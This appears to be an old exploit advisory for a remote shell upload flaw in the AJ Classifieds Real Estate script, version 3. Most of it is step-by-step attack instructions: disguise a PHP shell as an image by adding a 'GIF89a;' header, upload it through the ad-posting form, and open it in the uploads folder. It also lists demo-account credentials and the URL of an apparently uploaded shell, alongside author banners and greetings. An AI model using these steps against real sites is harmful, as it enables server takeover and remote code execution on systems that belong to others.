AJ Classifieds - Real Estate version 3 suffers from a remote shell upload vulnerability.
cbffb4cdd89538e23790baa0511a76fa7f580fea2de9ff728b2c9a8d9b14a0dc
[~] AJClassifieds Realestate RFu
[~]
[~] script down: https://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Realestate/
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 16.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
you go index.php?do=postad
add you post select your image for Main Image and Thumbnail Image
https://z0rlu.blogspot.com/script/pictures/[id]shell.php
exp for demo:
user: demouser@ajsquare.com
pass: demouser
https://www.ajclassifieds.net/demo/ajclassifiedsme/Classifieds_Realestate/uploadimages/20090116070716c.php
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------